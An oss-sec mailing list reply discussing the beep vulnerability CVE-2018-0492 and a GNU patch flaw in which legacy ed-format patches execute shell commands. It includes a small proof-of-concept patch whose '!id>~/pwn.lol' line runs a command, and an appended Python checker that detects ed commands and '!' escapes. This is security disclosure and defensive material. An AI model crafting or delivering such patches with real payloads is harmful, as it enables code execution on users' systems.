oss-sec mailing list archives

Re: Privsec vuln in beep / Code execution in GNU patch


From: Jakub Wilk <jwilk () jwilk net>
Date: Fri, 6 Apr 2018 11:51:40 +0200

* Hanno Böck <hanno () hboeck de>, 2018-04-06, 08:52:
There was a joke webpage about a vulnerability in beep a few days ago:
http://holeybeep.ninja/
There's also a corresponding Debian Advisory:
https://lists.debian.org/debian-security-announce/2018/msg00089.html
Neither has any technical details. CVE is CVE-2018-0492.

If anyone knows the background of this please share it.

Upstream bug report:
https://github.com/johnath/beep/issues/11

GNU patch supports a legacy "ed" format for patches and that allows executing external commands.
[...]
--- a   2018-13-37 13:37:37.000000000 +0100
+++ b   2018-13-37 13:38:38.000000000 +0100
1337a
1,112d
!id>~/pwn.lol

This bug triggers even with -u (which is supposed to disable patch type detection). :-/

--
Jakub Wilk
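
A pre-flight check for the behaviour reported above, as an added example that is not part of the original message or of GNU patch: because the reply notes that -u does not prevent the ed path, this Python check inspects the patch text before patch is invoked and rejects anything that contains ed-style command lines. The function names and the sample inputs are assumptions constructed for illustration.

```python
import re
import sys

# ed command at column 0, e.g. "1337a" or "1,112d". Unified and context
# diffs prefix every content line, so such a line does not occur in them.
ED_COMMAND = re.compile(r"^\d+(,\d+)?[acdi]\s*$")

def inspect_patch(text):
    """Return ed-style command lines and '!' lines found in patch text."""
    lines = list(enumerate(text.splitlines(), 1))
    ed_commands = [(n, line) for n, line in lines if ED_COMMAND.match(line)]
    # Only reported for an ed-style patch: context diffs also start changed
    # lines with "!". Text blocks after a/c/i are deliberately not skipped,
    # because the sample in the message has its "!" line after an "a".
    shell_escapes = [(n, line) for n, line in lines
                     if ed_commands and line.startswith("!")]
    return {"ed_commands": ed_commands, "shell_escapes": shell_escapes}

def is_acceptable(text):
    """Accept only patches with no ed-style command lines at all."""
    return not inspect_patch(text)["ed_commands"]

# Constructed samples (not real patches).
ED_SAMPLE = (
    "--- a\t2018-01-01 00:00:00.000000000 +0100\n"
    "+++ b\t2018-01-01 00:00:01.000000000 +0100\n"
    "1337a\n"
    "1,112d\n"
    "!echo constructed-sample\n"
)
UNIFIED_SAMPLE = (
    "--- a/f.txt\n+++ b/f.txt\n@@ -1,2 +1,2 @@\n keep\n-old!\n+!new\n"
)
CONTEXT_SAMPLE = (
    "*** a/f.txt\n--- b/f.txt\n***************\n*** 1,2 ****\n"
    "  keep\n! old\n--- 1,2 ----\n  keep\n! new\n"
)

if __name__ == "__main__":
    # Reads a patch on stdin; exit status 1 means "do not feed this to patch".
    report = inspect_patch(sys.stdin.read())
    for kind, hits in report.items():
        for lineno, line in hits:
            print(f"{kind}: line {lineno}: {line}")
    sys.exit(1 if report["ed_commands"] else 0)
```

The check is intentionally stricter than the reported problem: it refuses every ed-style patch, not only those with a `!` line, and reports the `!` lines separately for triage.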

